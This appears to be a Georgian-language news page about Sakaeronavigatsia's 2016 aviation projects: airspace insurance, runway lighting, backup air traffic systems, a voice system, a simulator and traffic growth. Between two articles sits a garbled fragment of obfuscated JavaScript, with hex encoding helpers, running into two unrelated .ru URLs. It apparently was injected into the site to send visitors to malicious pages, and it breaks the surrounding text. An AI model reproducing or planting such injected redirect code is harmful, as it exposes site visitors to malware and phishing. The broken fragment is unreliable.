შპს “საქაერონავიგაცია” 2016 წელს

2016 წელი ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს „საქაერონავიგაციისათვის“ ინოვაციებისა და წარმატებული პროექტების წელი იყო. ფრენების მუდმივი ზრდის ტენდენცია კომპანიამ გამოწვევად მიიღო და გასულ წელს არაერთი უმნიშვნელოვანესი პროექტი განახორციელა, მათ შორის თბილისის საერთაშორისო აეროპორტის ასაფრენი ზოლის შუქ-ტექნიკური სისტემების რეაბილიტაცია, საჰაერო სივრცის დაზღვევა, თანამედროვე მეტეო რადიოლოკატორის დამონტაჟება, ახალი ავიამეთვალყურეების შერჩევა და სხვა.

  • დაზღვეული საჰაერო სივრცე

2016 წლის ერთ-ერთი ყველაზე მნიშვნელოვანი მოვლენა საქართველოს საჰაერო სივრცის დაზღვევაა. აღნიშნული პროექტი  თავისი მნიშვნელობით უპრეცედენტო და ამავდროულად, უდიდესი სახელმწიფოებრივი მნიშვნელობის აქტია, რომელიც საქართველოს მთავრობას ათავისუფლებს საქართველოს საჰაერო სივრცეში შესაძლო საავიაციო ინციდენტის შედეგად წარმოშობილი ფინანსური პასუხისმგებლობისგან ნახევარი მილიარდი აშშ დოლარის ფარგლებში, რაც შესაბამისად ქვეყნისთვის უდიდესი მატერიალური რესურსის დაზოგვას გულისხმობს.

საჰაერო სივრცის დაზღვევა

  • თბილისის საერთაშორისო აეროპორტის ასაფრენ-დასაფრენი ზოლის შუქ-ტექნიკური სისტემების რეაბილიტაცია

შოთა რუსთაველის სახელობის თბილისის საერთაშორისო აეროპორტს სარეაბილიტაციო სამუშაოების დასრულების შემდეგ სრულად განახლებული და მოდერნიზებული, საერთაშორისო სტანდარტებთან შესაბამისი, ICAO-ს სტანდარტების მეორე კატეგორიის შუქ-ტექნიკური საშუალებებით აღჭურვილი ასაფრენ-დასაფრენი ზოლი  და სამიმოსვლო ბილიკები აქვს.  საქაერონავიგაციამ განათების სისტემას 800 სანათი დაამატა და ახლა ასაფრენ-დასაფრენ ზოლს და სამიმოსვლო ბილიკებს სულ 1500-ზე მეტი სანათი ანათებს. განათების ახალი სისტემა კიდევ უფრო აამაღლებს ფრენების უსაფრთხოების დონეს საქართველოში და საჰაერო ხომალდებს, ძლიერი ნისლის, ცუდი მეტეოპირობებისა და მხედველობის დროს, აფრენა-დაფრენას საგრძნობლად გაუადვილებს. აგრეთვე მოიმატებს უსაფრთხოების დონე აეროდრომზე საჰაერო ხომალდების მანევრირებისას.

ასაფრენი ზოლის განათება

  • ICZ(ALES) –ის სარეზერვო სისტემა თბილისში

თბილისის საჰაერო მოძრაობის მართვის ცენტრში ჩეხურმა კომპანია ICZ(ALES)-მა საჰაერო მოძრაობის მართვის სარეზერვო სისტემა დაამონტაჟა, რომელიც კიდევ უფრო დაცული გახადა საქართველოს საჰაერო სივრცეს, რომელიც უკვე სამმაგად იქნება დაცული ნებისმიერი ტექნიკური შეფერხებისგან. ჩეხური წარმოების სარეზერვო სისტემამ ჩაანაცვლა  ამერიკული წარმოების სარეზერვო სისტემა, რომლის ექსპლუატაციის ვადა 2016 წლის ბოლოს ამოიწურა.

სიმულიატორი

  • INDRA-ს სარეზერვო სისტემა ქუთაისში

სარეზერვო სისტემა დამონტაჟდა ასევე ქუთაისშიც. ეს არის ძირითადი სისტემისგან დამოუკიდებელი რეზერვი, რომელიც უკვე სრულად გამორიცხავს სამუშაო პროცესის შეფერხებას. სარეზერვო სისტემა ქუთაისში  კომპანიას აძლევს საშუალებას, თბილისის ძირითადი საჰაერო მოძრაობის მართვის ცენტრთან კავშირის დაკარგვის შემთხვევაში (სტიქიური უბედურების ან გაუთვალისწინებელი ვითარების დადგომის დროს), შეყოვნების გარეშე გააგრძელოს საჰაერო ხომალდების სააერნაოსნო მომსახურება. ხაზგასასმელია ფაქტი, რომ საჰაერო მოძრაობის მართვის სარეზერვო ცენტრი საქართველოში პირველად შეიქმნა და ის თავისი ფუნქციით უნიკალურია. ზოგადად, თავისი ადგილმდებარეობითა და კლიმატური თვისებებით, ქუთაისის საერთაშორისო აეროპორტი იდეალური სარეზერვო აეროპორტია არა მარტო თბილისისთვის, არამედ მეზობელი ქვეყნებისთვისაც. ქუთაისის აეროპორტს აქვს შესაძლებლობა, რომ სატრანზიტო დერეფნის უმნიშვნელოვანესი წერტილი გახდეს. ასე რომ, აქ საჰაერო მოძრაობის მართვის სარეზერვო ცენტრის გამართვა არა მხოლოდ საქართველოსთვის, არამედ ამიერკავკასიის რეგიონისთვისაც არის მნიშვნელოვანი.

ქუთაისი

  • რადიოსადგურების სისტემა კახეთში

2016 წლის მაისში შპს „საქაერონავიგაციამ“ კახეთში (მთა ცივი) “მიწა-ჰაერის” ახალი სტაციონარული რადიოსადგურების სისტემა დაამონტაჟა, რომლის მეშვეობითაც დაბალ ეშელონზე (G კლასი) მფრენ მცირე ზომის საჰაერო ხომალდებთან ორმხრივი კავშირის დაამყარება პირველად გახდა შესაძლებელი. ცივ გომბორის მთიანი მასივი თბილისსა და კახეთს შორის უწყვეტი კავშირის დამყარებაში ბარიერს ქმნიდა და ამ ზონაში მფრენ მცირე ზომის ხომალდებთან დასაკავშირებლად 10-15 წუთი იყო საჭირო. ამგვარი კავშირის არსებობა მას შემდეგ გახდა აუცილებელი, რაც თავდაცვის სამინისტროს სსტც „დელტამ“  სეტყვის საწინააღმდეგო დანადგარი აამოქმედა.

 

  • ხმოვანი კავშირის ახალი სისტემა

გასული წლის ერთ-ერთი უმნიშვნელოვანესი პროექტია, ასევე, ხმოვანი კავშირის ახალი სისტემის დანერგვა, რომელიც შპს „საქაერონავიგაციამ“ იტალიური კომპანია “S.I.T.T.I. S.p.A”-სგან შეიძინა. უმაღლესი სტანდარტის, ახალი ხმოვანი კავშირის სისტემა შპს „საქაერონავიგაციას“ საშუალებას მისცემს უმოკლეს დროში პირდაპირი კავშირი დაამყაროს ავიამეთვალყურესა და მფრინავს შორის და კიდევ უფრო მაღალ დონეზე უზრუნველყოს ფრენების უსაფრთხოება საქართველოს საჰაერო სივრცეში.

logo_sitti

  • INDRA-ს სიმულატორი

საჰაერო მიმოსვლის მართვის პროცესში ავიამეთვალყურეთა მაღალი კვალიფიკაცია უმთავრესია. სამუშაოს სპეციფიკიდან გამომდინარე, თითქოს უმნიშვნელო შეცდომაც კი შესაძლოა ფატალური შედეგით დასრულდეს. ამის გამო, ავიამეთვალყურეთა პროფესიონალიზმს დიდი ყურადღება ექცევა. მეთვალყურეები მუდმივ წვრთნას გადიან იმისათვის, რომ მოულოდნელი სტრესული სიტუაცია, სადაც უსწრაფესი მოქმედებაა საჭირო, მათთვის სულაც არ აღმოჩნდეს უცხო და დამაბნეველი. ამიტომ, თეორიული ცოდნის გარდა, ავიამეთვალყურეები პერიოდულად პრაქტიკულ სწავლებას გადიან, რაც სიმულატორთან მუშაობას გულისხმობს. ამ შემთხვევაში, ისინი, ხელოვნურად შექმნილ სიტუაციაში მუშაობენ, სიმულირებულ მართვის პულტთან და საკუთარ თავზე გამოცდიან ყველა სტრესულ სიტუაციას, რომლის წინაშეც რეალურად შეიძლება აღმოჩდნენ.

გასულ წელს,  შპს „საქაერონავიგაციამ“ თბილისის საჰაერო მოძრაობის მართვის ცენტრში ექსპლუატაციაში მიიღო ესპანური კომპანია „INDRA SISTEMAS S.A” -ს წარმოების სიმულატორი, რომელიც სრულიად შეესაბამება, როგორც საერთაშორისო სტანდარტებსა და რეკომენდაციებს, ასევე საქართველოს ერთიანი ცის იმპლიმენტაციის გეგმას. INDRA-ს წარმოებული სისტემა თანამედროვე საჰაერო მოძრაობის მართვის ფუნქციებსა და დახვეწილ ინტერფეისს აერთიანებს. ესპანური კომპანიის წარმომადგენლები მონიტორინგს გაუწევენ სწავლების პროცესს.

გოჩა მეზვრიშვილი

  • ახალი ავიამეთვალყურეები

ფრენების გაზრდილი რაოდენობის გამო, „საქაერონავიგაციამ“ დამატებითი ავიამეთვალყურეების შესარჩევად ღია კონკურსი გამოაცხადა. რომლის საფუძველზეც შერჩეული იქნა 12 ავიამეთვალყურე –  7 თბილისში, 5 რეგიონებში. კონკურსში გამარჯვებულები პროფესიას ჩეხეთში, ევროპის ერთ-ერთ წამყვან საავიაციო უნივერსიტეტში ეუფლებიან.

შპს „საქაერონავიგაციამ“ ვაკანსია გამოაცხადა  საჰაერო მოძრაობის მართვის (AFIS) ოპერატორის პოზიციაზეც ამბროლაურის აეროპორტში, რომლის საფუძველზეც შეირჩა  4 კანდიდატი. ავიამეთვალყურეების მსგავსად, ისინიც ჩეხეთის საავიაციო სასწავლებელში გაივლიან სწავლებას.

აეროპორტის განათება

  • RDGE/25

2016 წლის ერთ-ერთი ყველაზე მნიშვნელოვანი მოვლენა „საქაერონავიგაციის“ საქმიანობაში საჰაერო მოძრაობის მარშრუტების განვითარების ჯგუფის (RDGE) 25-ე საიუბილეო შეხვედრა იყო. ოქტომბერში კომპანიამ სამოქალაქო ავიაციის საერთაშორისო ორგანიზაცია (ICAO) 70-ზე მეტ დელეგატს უმასპინძლა. RDGE 25 – ს იკაოს ევროპულ ბიუროში შემავალი ყველა ქვეყნის დელეგატი დაესწრო, მოწვეულ სტუმრებს შორის იყვნენ საერთაშორისო საავიაციო ორგანიზაციების, ასევე იკაოს სამი ოფისის (ევროპისა და ჩრდილო ატლანტიკური, ახლო აღმოსავლეთისა და სამხრეთ აფრიკის, აზიისა და წყნარი ოკეანის) წევრი სახელმწიფოების წარმომადგენლები. ასეთი მასშტაბის ღონისძიების საქართველოში ჩატარება კიდევ ერთხელ უსვამს ხაზს, რომ საქართველოს ხელისუფლების ძალისხმევა – მეტად განავითაროს საავიაციო ინდუსტრია ქვეყანაში, წარმატებული და შედეგიანია.

ICAO-ს პარიზის ოფისის რეგიონალურმა დირექტორმა ლუის ფონსეკა დე ალმეიდამ შპს “საქაერონავიგაციის” გენერალურ დირექტორს გოჩა მეზვრიშვილს განსაკუთრებული მადლობა გადაუხადა წარმატებულად ჩატარებული ღონისძიებისთვის.

შეხვედრის ფარგლებში საქაერონავიგაციამ ევროპული ბიუროს ქვეყნებს სამი ახალი მარშრუტი შესთავაზა. ახალი საჰაერო მარშრუტები გააერთიანებს ჩვენი რეგიონის რამდენიმე ქვეყანას და რეგიონალურ ჭრილში მოიზიდავს უფრო მეტ ავიაკომპანიას.

icao-letter

  • ფრენების გაზრდილი რაოდენობა

2016 წელს შპს “საქაერონავიგაცია” 128 126 საჰაერო ხომალდს მოემსახურა, რაც 6 %-ით მეტია გასულ წელთან შედარებით. გაიზარდა, საქართველოს აეროპორტებში მომფრენი და გამფრენი (24 480), ასევე სატრანზიტო რეისების (97 691) რაოდენობაც.

“საქაერონავიგაცია” საქართველოს საჰაერო სივრცეში ტრანზიტულ ხომალდებს 19 მარშრუტზე ემსახურება. ბოლო 4 წლის განმავლობაში დაემატა 6 ახალი საჰაერო მარშრუტი, რის შდეგადაც საქართველო სატრანზიტო კუთხით კიდევ უფრო მიმზიდველი გახდა ავიაკომპანიებისთის.

ევროკონტროლის მონაცემებით, ფრენების რაოდენობის ზრდა მომავალ წლებშიც შენარჩუნდება. ეს ტენდენცია მნიშვნელოვანი გამოწვევების წინაშე აყენებს კომპანიას. სწორედ ამიტომ, 2017 წელს კომპანიის პრიორიტეტად კვლავაც რჩება უახლესი, საერთაშორისო სტანდარტებთან შესაბამისი სისტემების ექსპლოატაცია და თანამშრომელთა კვალიფიკაციის დონის მუდმივი ზრდა.

შპს „საქაერონავიგაცია“ლვოვის საჰაერო მოძრაობის მართვის ცენტრის გახსნის ცერემონიაზე

უკრაინის საჰაერო ნავიგაციის სერვისის პროვაიდერის (UkSATSE) მოწვევით, 26 აგვისტოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს „საქაერონავიგაციის“ დელეგაცია  ლვოვის საჰაერო მოძრაობის მართვის ახალი რეგიონალური ცენტრის გახსნის ცერემონიას დაესწრო.

ლვოვში საჰაერო მოძრაობის მართვის ახალი ცენტრის მშენებლობა  2013 წელს დაიწყო. სამშენებლო სამუშაოების დასრულების შემდეგ, რეგიონალურ ცენტრში დამონტაჟდა თანამედროვე საჰაერო მოძრაობის მართვის სისტემა (Roksolana).

“ვულოცავ, უკრაინას ახალი რეგიონალური მართვის ცენტრის გახსნას, რაც კიდევ უფრო აამაღლებს ფრენის უსაფრთხოების დონეს ქვეყანაში. საქაერონავიგაცია წლებია თანამშრომლობს უკრაინელ კოლეგებთან. ჩვენი მჭირდო, მეგობრული ურთიერთობა საშუალებას გვაძლევს გავუზიაროთ ერთმანეთს ცოდნა და გამოცდილება და ამით, კიდევ უფრო ავამაღლოთ ჩვენი კომპანიების მომსახურების ხარისხი.“ – განაცხადა შპს „საქაერონავიგაციის“ გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

ლვოვის რეგინალური მართვის ცენტრი საჰაერო სივრცეს უკრაინის  რვა რეგიონში აკონტროლებს. დღეისათვის ის აღჭურვილია საერთაშორისო სტანდარტებით აღიარებული სისტემებითა და სანავიგაციო საშუალებებით.

საქაერონავიგაციის უპრეცენდენტო პროექტი

დღეიდან საქართველოს ცა დაზღვეული იქნება.  პროექტი, რომელიც ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს “საქაერონავიგაციამ” განახორციელა, უპრეცენდენტოა და მას საქართველოს საავიაციო ისტორიაში ანალოგი არ მოეძებნება. საქართველოს საჰაერო სივრცის დაზღვევა იქნება მნიშვნელოვანი წინსვლა ქართული ავიაციის საერთაშორისო სტანდარტებთან კიდევ უფრო მიახლოების პროცესში.

საჰაერო სივრცის დაზღვევის აუცილებლობა საქართველოს წინაშე რამდენიმე წლის წინდადგა, თუმცა მაშინ ამ პროექტის განხორციელება ვერ მოხერხდა. საქაერონავიგაციამ საჰაერო სივრცის დაზღვევის ვალდებულება  2014 წელს, ევროკონტროლში გაწევრიანების შემდეგ აიღო, ამ რეკომენდაციას მას საერთაშორისო საავიაციო ორგანიზაციებიც აძლევდნენ.

შპს „საქაერონავიგაციის” საქმიანობის არეალია საქართველოს საჰაერო სივრცე, ასევე, საქართველოს ტერიტორიაზე არსებული სამოქალაქო აეროპორტების (ქ. თბილისი, ქ. ქუთაისი, ქ. ბათუმი და დაბა მესტია)აფრენა-დაფრენის ზონები და ოკუპირებული აფხაზეთის საჰაერო სივრცის მაღალი სიმაღლე (FL-280 და ზევით).

“აღნიშნულ პროექტზემუშაობა 2 წლის წინ დავიწყეთ. პროცესი რთული იყო, გამოცდილება ამ კუთხით არ ჰქონდა არც საქაერონავიგაციას და არც სადაზღვევო კომპანიებს. საერთაშორისო საავიაციო ორგანიზაციების მხრიდან მოთხოვნები და პირობები კი მკაცრად იყო გაწერილი. ჩვენ დავეყრდენით ევროპულ გამოცდილებას, გავიარეთ კონსულტაციები სხვადასხვა ქვეყნის საჰაერო სერვისის პროვაიდერებთან და მოხარული ვარ, რომ ასეთი სახელმწიფოებრივი მნიშვნელობის პროექტი წარმატებით განვახორციელეთ. საქართველოს საჰაერო სივრცის დაზღვევით ორგანიზაცია კიდევ ერთხელ უსვამს ხაზს, რომ დარწმუნებულია თავისი თანამშრომლების მაღალ კვალიფიკაციაში და გააჩნია მაღალტექნოლოგიური, საერთაშორისო სტანდარტებთან შესაბამისი ინფრასტრუქტურა. პარალელურად ჩვენ პრიორიტეტად რჩება უახლესი ტექნოლოგიების დანერგვა და თანამშრომელთა კვალიფიკაციის მუდმივი ამაღლება’,- განაცხადა შპს “საქაერონავიგაციის” გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

საჰაერო სივრცის დაზღვევა ითვალისწინებს შპს „საქაერონავიგაციის“, როგორც სააერნაოსნო მომსახურების მიმწოდებლის, საქმიანობის შედეგად შესაძლო სამოქალაქო სამართლებრივი პასუხისმგებლობის დაზღვევას მესამე პირთა წინაშე.  ანუ თუ საქართველოს საჰაერო სივრცეში, კომპანიის ბრალეულობით, მოხდება რაიმე საავიაციო ინციდენტი, დაზარალებულის უფლებები ყოველმხრივ დაცული, ხოლო ზარალი ანაზღაურებული იქნება. პასუხისმგებლობის ლიმიტი 500,000,000 აშშ დოლარია.

ღია ტენდერში სადაზღვევო კომპანია “უნისონმა” გაიმარჯვა, რომელიც საქართველოს სადაზღვევო ბაზრის ლიდერთა სამეულშია, გააჩნია მნიშვნელოვანი გამოცდილება და წარმომადგენლობითი პორტფელი. ამ ეტაპზე ყველა დეტალი საქაერონავიგაციას და უნისონს შორის შეთანხმებულია, რაც პროექტის წარმატებისთვის მყარი წინაპირობაა.

“სადაზღვევო კომპანია “უნისონმა” აიღო ვალდებულება და სამოქალაქო პასუხისმგებლობა 500 მილიონი აშშ დოლარის ფარგლებში 100%-ით გადააზღვია. გადამზღვევი კომპანიები, “საქაერონავიგაციის” მოთხოვნის შესაბამისად, დარეგისტრირებული არიან OECD (ეკონომიკური განვითარებისა და თანამშრომლობის ორგანიზაცია) წევრ ქვეყანაში და მათი საერთაშორისო სარეიტინგო შეფასებაა არანაკლებ Standard & Poor’s: A-. გადამზღვევი კომპანიებმა აიღეს პასუხისმგებლობა, მზღვეველის გაკოტრების ან ლიკვიდაციის შემთხვევაში, ხელშეკრულებით გათვალისწინებული ვალდებულებების შესრულებაზე. იმედი მაქვს, ჩვენი და საქაერონავიგაციის თანამშრომლობა წარმატებული იქნება, – აღნიშნა სადაზღვევო კომპანია “უნისონის” დირექტორმა ვასილ ახრახაძემ.

“საქაერონავიგაციის” სამოქალაქო პასუხისმგებლობის დაზღვევის პროექტი არის სახელმწიფოებრივი მნიშვნელობის აქტი, რადგან ის საქართველოს მთავრობას ათავისუფლებს შესაძლო საავიაციო ინციდენტის შედეგად წარმოშობილი ფინანსური პასუხისმგებლობისგან 500 მილიონი დოლარის ფარგლებში.

დაზღვეული ქართული ცა კიდევ უფრო მიმზიდველი გახდება ბევრი ქვეყნის სააერნაოსნო სერვისის პროვაიდერებისთვის და შესაბამისად, უცხოური ავიაკომპანიებისთვის. ეს პროექტი არის მნიშვნელოვანი ნაბიჯი ქართული ავიაციის აღმშენებლობის, მისი მდგრადობის, საიმედოობისა და დამოუკიდებლობის განმტკიცების კუთხით.

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "airnav.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

შპს „საქაერონავიგაციაში“ ხმოვანი კავშირის ახალი სისტემა დამონტაჟდება

საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს „საქაერონავიგაციამ“ ხმოვანი კავშირის ახალი სისტემა შეიძინა. უსაფრთხო ფრენების განხორციელება, ავიამეთვალყურის და საჰაერო ხომალდებს შორის კავშირის გარეშე, წარმოუდგენელია. საქაერონავიგაციას და იტალიურ კომპანია “S.I.T.T.I. S.p.A”-ს შორის გაფორმდა ხელშეკრულება ხმოვანი კავშირის სისტემის (VCS) შესყიდვისა და მისი დანერგვის თაობაზე.

Gocha Mezvrishvili

„საჰაერო მოძრაობის მართვის პროცესში  ხმოვანი კავშირის სისტემა უმნიშვნელოვანესია. იმისათვის რომ უსაფრთხო ფრენები განხორციელდეს აუცილებელია საიმედო კავშირი მეთვალყურეებს და საჰაერო ხომალდებს შორის, აგრეთვე მეთვალყურეებს და მიწისზედა სამსახურებს და მეზობელ ცენტრებს შორის. ამჟამად შპს „საქაერონავიგაციაში“ არსებული ხმოვანი კავშირის სისტემა დაფუძნებულია მოძველებულ ტექნოლოგიებზე და ახალი INDRA-ს სისტემის დანერგვის შემდეგ, ვეღარ დააკმაყოფილებს საერთაშორისო რეკომენდაციებს. იტალიური კომპანია “S.I.T.T.I. S.p.A”-ის მიერ წარმოებულისისტემის შესყიდვისა და   დანერგვის პროცესები სრულიად შეესაბამება ევროკონტროლის ერთიანი ევროპული ცის იმპლემენტაციის (ESSIP) 2015 წლის განვითარების გეგმაში მოცემულ დეტალურ  მოთხოვნებს.“ – განაცხადა საქაერონავიგაციის გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

გოჩა მეზვრიშვილი

ახალი სისტემა დამონტაჟდება საჰაერო მოძრაობის მართვის ავტომატიზირებული სისტემის სამუშაო პოზიციებზე (თბილისის ძირითადი სისტემა, ქუთაისის სარეზერვო სისტემა და თბილისის ტრენინგ ცენტრი). იტალიური კომპანიის მიერ წარმოებული სისტემა ინტეგრირებული იქნება საჰაერო მოძრაობის მართვის ახალი ავტომატიზირებული სისტემის (INDRA) შესაბამის ნაწილში.

უმაღლესი სტანდარტის, ახალი ხმოვანი კავშირის სისტემა შპს „საქაერონავიგაციას“ საშუალებას მისცემს, კიდევ უფრო მაღალ დონეზე უზრუნველყოს ფრენების უსაფრთხოება საქართველოს საჰაერო სივრცეში.

 

ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, დიმიტრი ქუმსიშვილმა საჰაერო მოძრაობის მართვის ცენტრის ახალი შენობა დაათვალიერა

ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, დიმიტრი ქუმსიშვილმა შპს “საქაერონავიგაციის” საჰაერო მოძრაობის მართვის ცენტრის ახალი შენობა დაათვალიერა.

საჰაერო მოძრაობის მართვის ცენტრის მშენებლობა 2014 წლის ივლისში დაიწყო და გეგმის მიხედვით, 2016 წლის ბოლოს დასრულდება.  2017 წელს ახალ შენობაში დამონტაჟდება ესპანური კომპანია „INDRA“ მიერ წარმოებული საჰაერო მოძრაობის ავტომატიზირებული მართვის სისტემა. ახალი ტექნოლოგიების დანერგვა არსებული ინფრასტრუქტურის სრულ შეცვლას ითვალისწინებს, რაც ხელს შეუწყობს კომპანიის ძირითადი საქმიანობის – ფრენების უსაფრთხოების უზრუნველყოფას და კიდევ უფრო მაღალ სტანდარტებზე გადასვლას. საჰაერო მოძრაობის მართვის ცენტრი სამოქალაქო ავიაციის საერთაშორისო ორგანიზაციის რეკომენდაციებისა და მოთხოვნების შესაბამისად შენდება. ახალი მართვის ცენტრი საქართველოს საჰაერო სივრცის გამტარუნარიანობასაც გაზრდის და კომპანიას შესაძლებლობა ექნება, მაღალი დონის სანავიგაციო მომსახურება უფრო მეტ უცხოურ ავიაკომპანიას გაუწიოს.

პროექტის საერთო ღირებულება 23 მილიონ ლარს აჭარბებს.

 

დიმიტრი ქუმსიშვილი

დიმიტრი ქუმსიშვილი გოჩა მეზვრიშვილი

ეკონომიკის მინისტრი